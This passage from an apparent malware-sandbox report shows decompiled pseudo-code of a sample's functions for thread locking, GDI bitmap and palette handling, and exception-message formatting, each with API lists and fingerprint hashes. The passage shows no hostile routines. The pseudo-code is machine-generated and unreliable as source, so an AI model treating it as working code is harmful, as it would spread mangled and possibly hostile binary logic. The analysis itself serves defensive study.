					_v20 = 0;
					_t61 =  *0x46fc4c; // 0x410908
					E0040B928(_t53, _t61, 1, __edi, __esi, 0,  &_v24);
					E00403B64();
				}
				if(_t53 <= 0) {
					E004198E4();
				} else {
					E004198F0(_t53);
				}
				_v16 = 0;
				_push(0x47086c);
				L0040615C();
				_push(_t72);
				_push(0x419ad1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				_v16 = InterlockedExchange( &E0046E3E4, _v16);
				_push(_t72);
				_push(0x419ab2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				if(_v16 == 0 ||  *((intOrPtr*)(_v16 + 8)) <= 0) {
					_t29 = 0;
				} else {
					_t29 = 1;
				}
				_v5 = _t29;
				if(_v5 == 0) {
					L15:
					_pop(_t63);
					 *[fs:eax] = _t63;
					_push(E00419AB9);
					return E00403398(_v16);
				} else {
					if( *((intOrPtr*)(_v16 + 8)) > 0) {
						_v12 = E00413D2C(_v16, 0);
						E00413C18(_v16, 0);
						L004062A4();
						 *[fs:eax] = _t74;
						 *[fs:eax] = _t74;
						 *((intOrPtr*)( *_v12 + 8))( *[fs:eax], _t72,  *[fs:eax], 0x419a55, _t72, 0x47086c);
						_pop(_t66);
						 *[fs:eax] = _t66;
						_t67 = 0x419a16;
						 *[fs:eax] = _t67;
						_push(E00419A5C);
						_push(0x47086c);
						L0040615C();
						return 0;
					} else {
						goto L15;
					}
				}
			}



















                                  0x0041990d
                                  0x0041990f
                                  0x00419913
                                  0x00419914
                                  0x00419915
                                  0x00419917
                                  0x0041991c
                                  0x00419924
                                  0x0041992b
                                  0x0041992e
                                  0x00419938
                                  0x00419945
                                  0x0041994a
                                  0x0041994a
                                  0x00419951
                                  0x0041995c
                                  0x00419953
                                  0x00419955
                                  0x00419955
                                  0x00419963
                                  0x00419966
                                  0x0041996b
                                  0x00419972
                                  0x00419973
                                  0x00419978
                                  0x0041997b
                                  0x0041998c
                                  0x00419991
                                  0x00419992
                                  0x00419997
                                  0x0041999a
                                  0x004199a1
                                  0x004199ac
                                  0x004199b0
                                  0x004199b0
                                  0x004199b0
                                  0x004199b2
                                  0x004199b9
                                  0x00419a9c
                                  0x00419a9e
                                  0x00419aa1
                                  0x00419aa4
                                  0x00419ab1
                                  0x004199bf
                                  0x00419a96
                                  0x004199ce
                                  0x004199d6
                                  0x004199e0
                                  0x004199f0
                                  0x004199fe
                                  0x00419a09
                                  0x00419a0e
                                  0x00419a11
                                  0x00419a3f
                                  0x00419a42
                                  0x00419a45
                                  0x00419a4a
                                  0x00419a4f
                                  0x00419a54
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00419a96

                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 00419917
                                  • GetCurrentThreadId.KERNEL32 ref: 00419926
                                    • Part of subcall function 004198E4: ResetEvent.KERNEL32(0000017C,00419961,?,?,00000000), ref: 004198EA
                                  • RtlEnterCriticalSection.KERNEL32(0047086C,?,?,00000000), ref: 0041996B
                                  • InterlockedExchange.KERNEL32(0046E3E4,?), ref: 00419987
                                  • RtlLeaveCriticalSection.KERNEL32(0047086C,00000000,00419AB2,?,00000000,00419AD1,?,0047086C,?,?,00000000), ref: 004199E0
                                  • RtlEnterCriticalSection.KERNEL32(0047086C,00419A5C,00419AB2,?,00000000,00419AD1,?,0047086C,?,?,00000000), ref: 00419A4F
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
                                  • String ID:
                                  • API String ID: 2189153385-0
                                  • Opcode ID: 1bf064d7ae4167a62a5ba19c0f7645c6c79dcab77ae4858d27ace3b683e4dab6
                                  • Instruction ID: 249a752301645a15f5ae1f04a3e4977800e5079047c6a7a711a44c1a2e6a256d
                                  • Opcode Fuzzy Hash: 1bf064d7ae4167a62a5ba19c0f7645c6c79dcab77ae4858d27ace3b683e4dab6
                                  • Instruction Fuzzy Hash: 7431F570A14340AFD701EF66C861AA9B7F8EF49704F5284BBF40496792D77C5C84CA6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041F730, Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E0041F730(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, void* __fp0, int _a4, signed int* _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v32;
				signed short _v44;
				int _t36;
				signed int _t37;
				signed short _t38;
				signed int _t39;
				signed short _t43;
				signed int* _t47;
				signed int _t51;
				intOrPtr _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				intOrPtr _t70;

				_t68 = _t69;
				_t70 = _t69 + 0xffffff90;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t47 = _a8;
				_v24 = _v16 << 4;
				_v20 = E00407C6C(_v24, __eflags, __fp0);
				 *[fs:edx] = _t70;
				_t51 = _v24;
				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:edx], 0x41fa29, _t68, __edi, __esi, __ebx, _t67);
				if(( *_t47 | _t47[1]) != 0) {
					_t36 = _a4;
					 *_t36 =  *_t47;
					 *(_t36 + 4) = _t47[1];
				} else {
					 *_a4 = GetSystemMetrics(0xb);
					_t36 = GetSystemMetrics(0xc);
					 *(_a4 + 4) = _t36;
				}
				_push(0);
				L004066E4();
				_v44 = _t36;
				if(_v44 == 0) {
					E0041EBD8(_t51);
				}
				_push(_t68);
				_push(0x41f819);
				_push( *[fs:edx]);
				 *[fs:edx] = _t70;
				_push(0xe);
				_t37 = _v44;
				_push(_t37);
				L0040641C();
				_push(0xc);
				_t38 = _v44;
				_push(_t38);
				L0040641C();
				_t39 = _t37 * _t38;
				if(_t39 <= 8) {
					__eflags = 1;
					_v32 = 1 << _t39;
				} else {
					_v32 = 0x7fffffff;
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(0x41f820);
				_t43 = _v44;
				_push(_t43);
				_push(0);
				L00406944();
				return _t43;
			}






















                                  0x0041f731
                                  0x0041f733
                                  0x0041f739
                                  0x0041f73c
                                  0x0041f73f
                                  0x0041f742
                                  0x0041f74b
                                  0x0041f756
                                  0x0041f764
                                  0x0041f76a
                                  0x0041f772
                                  0x0041f77a
                                  0x0041f797
                                  0x0041f79c
                                  0x0041f7a1
                                  0x0041f77c
                                  0x0041f786
                                  0x0041f78a
                                  0x0041f792
                                  0x0041f792
                                  0x0041f7a4
                                  0x0041f7a6
                                  0x0041f7ab
                                  0x0041f7b2
                                  0x0041f7b4
                                  0x0041f7b4
                                  0x0041f7bb
                                  0x0041f7bc
                                  0x0041f7c1
                                  0x0041f7c4
                                  0x0041f7c7
                                  0x0041f7c9
                                  0x0041f7cc
                                  0x0041f7cd
                                  0x0041f7d4
                                  0x0041f7d6
                                  0x0041f7d9
                                  0x0041f7da
                                  0x0041f7e3
                                  0x0041f7e9
                                  0x0041f7fb
                                  0x0041f7fd
                                  0x0041f7eb
                                  0x0041f7eb
                                  0x0041f7eb
                                  0x0041f802
                                  0x0041f805
                                  0x0041f808
                                  0x0041f80d
                                  0x0041f810
                                  0x0041f811
                                  0x0041f813
                                  0x0041f818

                                  APIs
                                  • GetSystemMetrics.USER32 ref: 0041F77E
                                  • GetSystemMetrics.USER32 ref: 0041F78A
                                  • 72E7AC50.USER32(00000000), ref: 0041F7A6
                                  • 72E7AD70.GDI32(00000000,0000000E,00000000,0041F819,?,00000000), ref: 0041F7CD
                                  • 72E7AD70.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041F819,?,00000000), ref: 0041F7DA
                                  • 72E7B380.USER32(00000000,00000000,0041F820,0000000E,00000000,0041F819,?,00000000), ref: 0041F813
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: MetricsSystem$B380
                                  • String ID:
                                  • API String ID: 3145338429-0
                                  • Opcode ID: 5c365a7b938f6f4884d2b9144afad8f3c89d0e1754947f4e61d0dd768b66d4c9
                                  • Instruction ID: e1a0fccb058b982b0167cad0ea1306bda6277b63250d80b5e5150878960a8353
                                  • Opcode Fuzzy Hash: 5c365a7b938f6f4884d2b9144afad8f3c89d0e1754947f4e61d0dd768b66d4c9
                                  • Instruction Fuzzy Hash: EE317374A002449FDB00DFA5C881AEEBBF5FB48714F118576E819AB380C738A941CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041FBA8, Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 45%
                                  			E0041FBA8(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v5;
				struct HDC__* _v12;
				struct HDC__* _v16;
				struct HDC__* _t29;
				struct tagBITMAPINFO* _t32;
				intOrPtr _t39;
				struct HBITMAP__* _t43;
				void* _t46;
				void* _t52;

				_t32 = __ecx;
				_t43 = __eax;
				E0041FA54(__eax, _a4, __ecx, _t52);
				_v12 = 0;
				_push(0);
				L00406374();
				_v16 = 0;
				_push(_t46);
				_push(0x41fc45);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffff4;
				if(__edx != 0) {
					_push(0);
					_push(__edx);
					_t29 = _v16;
					_push(_t29);
					L004064E4();
					_v12 = _t29;
					_push(_v16);
					L004064B4();
				}
				_v5 = GetDIBits(_v16, _t43, 0, _t32->bmiHeader.biHeight, _a8, _t32, 0) != 0;
				_pop(_t39);
				 *[fs:eax] = _t39;
				_push(E0041FC4C);
				if(_v12 != 0) {
					_push(0);
					_push(_v12);
					_push(_v16);
					L004064E4();
				}
				return DeleteDC(_v16);
			}












                                  0x0041fbb1
                                  0x0041fbb5
                                  0x0041fbbe
                                  0x0041fbc5
                                  0x0041fbc8
                                  0x0041fbca
                                  0x0041fbcf
                                  0x0041fbd4
                                  0x0041fbd5
                                  0x0041fbda
                                  0x0041fbdd
                                  0x0041fbe2
                                  0x0041fbe4
                                  0x0041fbe6
                                  0x0041fbe7
                                  0x0041fbea
                                  0x0041fbeb
                                  0x0041fbf0
                                  0x0041fbf6
                                  0x0041fbf7
                                  0x0041fbf7
                                  0x0041fc15
                                  0x0041fc1b
                                  0x0041fc1e
                                  0x0041fc21
                                  0x0041fc2a
                                  0x0041fc2c
                                  0x0041fc31
                                  0x0041fc35
                                  0x0041fc36
                                  0x0041fc36
                                  0x0041fc44

                                  APIs
                                    • Part of subcall function 0041FA54: GetObjectA.GDI32(?,00000054), ref: 0041FA68
                                  • 72E7A590.GDI32(00000000,?,?,?), ref: 0041FBCA
                                  • 72E7B410.GDI32(?,00000000,00000000,00000000,0041FC45,?,00000000,?,?,?), ref: 0041FBEB
                                  • 72E7B150.GDI32(?,?,00000000,00000000,00000000,0041FC45,?,00000000,?,?,?), ref: 0041FBF7
                                  • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041FC0E
                                  • 72E7B410.GDI32(?,00000000,00000000,0041FC4C,?,00000000,?,?,?), ref: 0041FC36
                                  • DeleteDC.GDI32(?), ref: 0041FC3F
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: B410$A590B150BitsDeleteObject
                                  • String ID:
                                  • API String ID: 3837315262-0
                                  • Opcode ID: 62bd1965c6a8086ea459442890f0f70e4a98d9617ad16270d96d09c6f179d0b7
                                  • Instruction ID: 054b00172579a8909992d8f268817eb6bafaa7520bbf52760cef8d6c51f48d10
                                  • Opcode Fuzzy Hash: 62bd1965c6a8086ea459442890f0f70e4a98d9617ad16270d96d09c6f179d0b7
                                  • Instruction Fuzzy Hash: 20115175A042087FDB10DBA9CC81F9EB7FCEF49704F118476B918E7282D678A950C768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041F3DC, Relevance: 9.1, APIs: 6, Instructions: 56COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 87%
                                  			E0041F3DC(struct HDC__* __eax, signed short __ecx) {
				char _v1036;
				signed short _v1038;
				struct tagRGBQUAD _v1048;
				short _v1066;
				short* _t15;
				void* _t18;
				struct HDC__* _t23;
				void* _t27;
				short* _t32;
				short* _t33;

				_t32 = 0;
				 *_t33 = 0x300;
				if(__eax == 0) {
					_v1038 = __ecx;
					E00402990(_t27, __ecx + __ecx + __ecx + __ecx,  &_v1036);
				} else {
					_push(0);
					L00406374();
					_t23 = __eax;
					_t18 = SelectObject(__eax, __eax);
					_v1066 = GetDIBColorTable(_t23, 0, 0x100,  &_v1048);
					SelectObject(_t23, _t18);
					DeleteDC(_t23);
				}
				if(_v1038 != 0) {
					if(_v1038 != 0x10 || E0041F344(_t33) == 0) {
						E0041F1D8( &_v1036, _v1038 & 0x0000ffff);
					}
					_t15 = _t33;
					_push(_t15);
					L0040639C();
					_t32 = _t15;
				}
				return _t32;
			}













                                  0x0041f3e7
                                  0x0041f3e9
                                  0x0041f3f1
                                  0x0041f42b
                                  0x0041f43a
                                  0x0041f3f3
                                  0x0041f3f3
                                  0x0041f3f5
                                  0x0041f3fa
                                  0x0041f3fe
                                  0x0041f417
                                  0x0041f41e
                                  0x0041f424
                                  0x0041f424
                                  0x0041f445
                                  0x0041f44d
                                  0x0041f463
                                  0x0041f463
                                  0x0041f468
                                  0x0041f46a
                                  0x0041f46b
                                  0x0041f470
                                  0x0041f470
                                  0x0041f47d

                                  APIs
                                  • 72E7A590.GDI32(00000000,00000000,?,?,00423273,?,?,?,?,00421C83,00000000,00421D0F), ref: 0041F3F5
                                  • SelectObject.GDI32(00000000,00000000), ref: 0041F3FE
                                  • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,00423273,?,?,?,?,00421C83), ref: 0041F412
                                  • SelectObject.GDI32(00000000,00000000), ref: 0041F41E
                                  • DeleteDC.GDI32(00000000), ref: 0041F424
                                  • 72E7A8F0.GDI32(?,00000000,?,?,00423273,?,?,?,?,00421C83,00000000,00421D0F), ref: 0041F46B
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: ObjectSelect$A590ColorDeleteTable
                                  • String ID:
                                  • API String ID: 1056449717-0
                                  • Opcode ID: 42a3df518f956a9194f157a1b37e07ed0aae3e32bc86873e351531cd0ca31899
                                  • Instruction ID: 9504cd4cc45ce934dc21eeb1b842140465d06d9cc918c3a1e68c36194d52cf3a
                                  • Opcode Fuzzy Hash: 42a3df518f956a9194f157a1b37e07ed0aae3e32bc86873e351531cd0ca31899
                                  • Instruction Fuzzy Hash: 9801847120431066E614B7668C43BAF72A88FC0718F05D93FB989A72C2E57D888A835E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041EAA8, Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0041EAA8(void* __eax) {
				void* _t36;

				_t36 = __eax;
				UnrealizeObject(E0041DEAC( *((intOrPtr*)(__eax + 0x14))));
				SelectObject( *(_t36 + 4), E0041DEAC( *((intOrPtr*)(_t36 + 0x14))));
				if(E0041DF8C( *((intOrPtr*)(_t36 + 0x14))) != 0) {
					SetBkColor( *(_t36 + 4),  !(E0041D170(E0041DE70( *((intOrPtr*)(_t36 + 0x14))))));
					return SetBkMode( *(_t36 + 4), 1);
				} else {
					SetBkColor( *(_t36 + 4), E0041D170(E0041DE70( *((intOrPtr*)(_t36 + 0x14)))));
					return SetBkMode( *(_t36 + 4), 2);
				}
			}




                                  0x0041eaa9
                                  0x0041eab4
                                  0x0041eac6
                                  0x0041ead5
                                  0x0041eb0f
                                  0x0041eb20
                                  0x0041ead7
                                  0x0041eae9
                                  0x0041eafa
                                  0x0041eafa

                                  APIs
                                    • Part of subcall function 0041DEAC: CreateBrushIndirect.GDI32(?), ref: 0041DF57
                                  • UnrealizeObject.GDI32(00000000), ref: 0041EAB4
                                  • SelectObject.GDI32(?,00000000), ref: 0041EAC6
                                  • SetBkColor.GDI32(?,00000000), ref: 0041EAE9
                                  • SetBkMode.GDI32(?,00000002), ref: 0041EAF4
                                  • SetBkColor.GDI32(?,00000000), ref: 0041EB0F
                                  • SetBkMode.GDI32(?,00000001), ref: 0041EB1A
                                    • Part of subcall function 0041D170: GetSysColor.USER32(?), ref: 0041D17A
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                  • String ID:
                                  • API String ID: 3527656728-0
                                  • Opcode ID: 8cd827c4f84d517be392d08eed1c220563ee38278a4d5f5f69c386bce2c10c16
                                  • Instruction ID: 822aa195731c7e48ed7a78965d4052e44e8d2372d6082ceb8a0622d70bce6f8f
                                  • Opcode Fuzzy Hash: 8cd827c4f84d517be392d08eed1c220563ee38278a4d5f5f69c386bce2c10c16
                                  • Instruction Fuzzy Hash: 6DF072F5600210ABDF40FFBAD9C6E4B7BAC5F14309705846AB909DF197CA79D8604739
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00423E2C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 112windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 88%
                                  			E00423E2C(intOrPtr* __eax, signed char __edx, void* __fp0) {
				intOrPtr* _v8;
				struct HPALETTE__* _v12;
				char _v13;
				intOrPtr _v25;
				intOrPtr _v29;
				intOrPtr _v33;
				intOrPtr _v57;
				short _v59;
				short _v61;
				intOrPtr _v65;
				intOrPtr _v69;
				intOrPtr _v73;
				intOrPtr _v77;
				intOrPtr _v89;
				intOrPtr _v93;
				void _v97;
				void* _t44;
				void* _t46;
				intOrPtr _t49;
				void* _t54;
				struct HPALETTE__* _t56;
				signed char _t70;
				void* _t72;
				void* _t73;
				struct HDC__* _t74;
				intOrPtr _t94;
				void* _t104;
				void* _t106;
				void* _t107;
				intOrPtr _t109;

				_t104 = _t106;
				_t107 = _t106 + 0xffffffa0;
				_t70 = __edx;
				_v8 = __eax;
				_t44 = E00422E84(_v8);
				if(_t70 == _t44) {
					L16:
					return _t44;
				} else {
					_t46 = _t70 - 1;
					if(_t46 < 0) {
						_t44 =  *((intOrPtr*)( *_v8 + 0x6c))();
						goto L16;
					} else {
						if(_t46 == 7) {
							_t49 =  *0x46fad4; // 0x41b5c8
							_t44 = E0041EB9C(_t49);
							goto L16;
						} else {
							E00402D4C( &_v97, 0x54);
							_t54 = memcpy( &_v97,  *((intOrPtr*)(_v8 + 0x28)) + 0x18, 6 << 2);
							_t109 = _t107 + 0xc;
							_v13 = 0;
							_v77 = 0;
							_v73 = 0x28;
							_v69 = _v93;
							_v65 = _v89;
							_v61 = 1;
							_v59 =  *((_t70 & 0x000000ff) + 0x46e6e7) & 0x000000ff;
							_t55 =  *((intOrPtr*)(_t54 + 0x10));
							_v12 =  *((intOrPtr*)(_t54 + 0x10));
							_t72 = _t70 - 2;
							if(_t72 == 0) {
								_t56 =  *0x470898; // 0xad0807a3
								_v12 = _t56;
							} else {
								_t73 = _t72 - 1;
								if(_t73 == 0) {
									_push(0);
									L004066E4();
									_t74 = E0041ECD4(_t55);
									_v12 = CreateHalftonePalette(_t74);
									_v13 = 1;
									_push(_t74);
									_push(0);
									L00406944();
								} else {
									if(_t73 == 2) {
										_v57 = 3;
										_v33 = 0xf800;
										_v29 = 0x7e0;
										_v25 = 0x1f;
									}
								}
							}
							 *[fs:eax] = _t109;
							 *((char*)(_v8 + 0x22)) = E00422964( *((intOrPtr*)( *_v8 + 0x64))( *[fs:eax], 0x423f78, _t104),  &_v97) & 0xffffff00 | _v12 != 0x00000000;
							_pop(_t94);
							 *[fs:eax] = _t94;
							_push(0x423f7f);
							if(_v13 != 0) {
								return DeleteObject(_v12);
							}
							return 0;
						}
					}
				}
			}

































                                  0x00423e2d
                                  0x00423e2f
                                  0x00423e35
                                  0x00423e37
                                  0x00423e3d
                                  0x00423e44
                                  0x00423f8a
                                  0x00423f90
                                  0x00423e4a
                                  0x00423e4c
                                  0x00423e4e
                                  0x00423e5d
                                  0x00000000
                                  0x00423e50
                                  0x00423e52
                                  0x00423e65
                                  0x00423e6a
                                  0x00000000
                                  0x00423e54
                                  0x00423e7e
                                  0x00423e94
                                  0x00423e94
                                  0x00423e96
                                  0x00423e9c
                                  0x00423e9f
                                  0x00423ea9
                                  0x00423eaf
                                  0x00423eb2
                                  0x00423ec2
                                  0x00423ec6
                                  0x00423ec9
                                  0x00423ecc
                                  0x00423ecf
                                  0x00423edc
                                  0x00423ee1
                                  0x00423ed1
                                  0x00423ed1
                                  0x00423ed3
                                  0x00423ee6
                                  0x00423ee8
                                  0x00423ef2
                                  0x00423efa
                                  0x00423efd
                                  0x00423f01
                                  0x00423f02
                                  0x00423f04
                                  0x00423ed5
                                  0x00423ed8
                                  0x00423f0b
                                  0x00423f12
                                  0x00423f19
                                  0x00423f20
                                  0x00423f20
                                  0x00423ed8
                                  0x00423ed3
                                  0x00423f32
                                  0x00423f58
                                  0x00423f5d
                                  0x00423f60
                                  0x00423f63
                                  0x00423f6c
                                  0x00000000
                                  0x00423f72
                                  0x00423f77
                                  0x00423f77
                                  0x00423e52
                                  0x00423e4e

                                  APIs
                                  • 72E7AC50.USER32(00000000), ref: 00423EE8
                                  • CreateHalftonePalette.GDI32(00000000,00000000), ref: 00423EF5
                                  • 72E7B380.USER32(00000000,00000000,00000000,00000000), ref: 00423F04
                                  • DeleteObject.GDI32(00000000), ref: 00423F72
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: B380CreateDeleteHalftoneObjectPalette
                                  • String ID: (
                                  • API String ID: 733450718-3887548279
                                  • Opcode ID: 4a3d3417f02c2b5a8f1e2f9d03adf18060aefa7beedbf4defbe4218012071cad
                                  • Instruction ID: cbc7e2afc336a302cd5e997c270a6e8a7109cc287d0e14503d8bf757a33d921a
                                  • Opcode Fuzzy Hash: 4a3d3417f02c2b5a8f1e2f9d03adf18060aefa7beedbf4defbe4218012071cad
                                  • Instruction Fuzzy Hash: C541D070B04208DFCB04DFA9E445BADB7F2EF45305F5140AAE804A7391D67C5E09CB49
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040BC40, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 107COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E0040BC40(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				char _v297;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				void* _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				intOrPtr _v352;
				char _v356;
				char _v360;
				char _v364;
				void* _v368;
				char _v372;
				intOrPtr _t52;
				intOrPtr _t60;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_t108 = __edi;
				_v372 = 0;
				_v336 = 0;
				_v344 = 0;
				_v340 = 0;
				_v8 = 0;
				_push(_t113);
				_push(0x40bdfb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffe90;
				_t89 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
					_t52 =  *0x46fc58; // 0x406dec
					E00405C70(_t52,  &_v8);
				} else {
					_t86 =  *0x46fdcc; // 0x406de4
					E00405C70(_t86,  &_v8);
				}
				_t110 =  *((intOrPtr*)(_t89 + 0x18));
				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
					_v368 =  *(_t89 + 0xc);
					_v364 = 5;
					_v360 = _v8;
					_v356 = 0xb;
					_v352 = _t110;
					_v348 = 5;
					_t60 =  *0x46fc64; // 0x406d94
					E00405C70(_t60,  &_v372);
					E0040B86C(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
				} else {
					_v332 =  *(_t89 + 0xc);
					_v328 = 5;
					E0040438C( &_v340, 0x105,  &_v297);
					E004087A8(_v340,  &_v336);
					_v324 = _v336;
					_v320 = 0xb;
					_v316 = _v8;
					_v312 = 0xb;
					_v308 = _t110;
					_v304 = 5;
					_t82 =  *0x46fcd0; // 0x406e8c
					E00405C70(_t82,  &_v344);
					E0040B86C(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
				}
				_pop(_t101);
				 *[fs:eax] = _t101;
				_push(E0040BE02);
				E0040411C( &_v372);
				E00404140( &_v344, 3);
				return E0040411C( &_v8);
			}

































                                  0x0040bc40
                                  0x0040bc4d
                                  0x0040bc53
                                  0x0040bc59
                                  0x0040bc5f
                                  0x0040bc65
                                  0x0040bc6a
                                  0x0040bc6b
                                  0x0040bc70
                                  0x0040bc73
                                  0x0040bc79
                                  0x0040bc80
                                  0x0040bc94
                                  0x0040bc99
                                  0x0040bc82
                                  0x0040bc85
                                  0x0040bc8a
                                  0x0040bc8a
                                  0x0040bc9e
                                  0x0040bcab
                                  0x0040bcb7
                                  0x0040bd73
                                  0x0040bd79
                                  0x0040bd83
                                  0x0040bd89
                                  0x0040bd90
                                  0x0040bd96
                                  0x0040bdac
                                  0x0040bdb1
                                  0x0040bdc3
                                  0x0040bcda
                                  0x0040bcdd
                                  0x0040bce3
                                  0x0040bcfb
                                  0x0040bd0c
                                  0x0040bd17
                                  0x0040bd1d
                                  0x0040bd27
                                  0x0040bd2d
                                  0x0040bd34
                                  0x0040bd3a
                                  0x0040bd50
                                  0x0040bd55
                                  0x0040bd67
                                  0x0040bd6c
                                  0x0040bdcc
                                  0x0040bdcf
                                  0x0040bdd2
                                  0x0040bddd
                                  0x0040bded
                                  0x0040bdfa

                                  APIs
                                  • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040BDFB), ref: 0040BCAB
                                  • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040BDFB), ref: 0040BCCD
                                    • Part of subcall function 00405C70: LoadStringA.USER32 ref: 00405CA2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: FileLoadModuleNameQueryStringVirtual
                                  • String ID: <w@$m@$m@
                                  • API String ID: 902310565-314995628
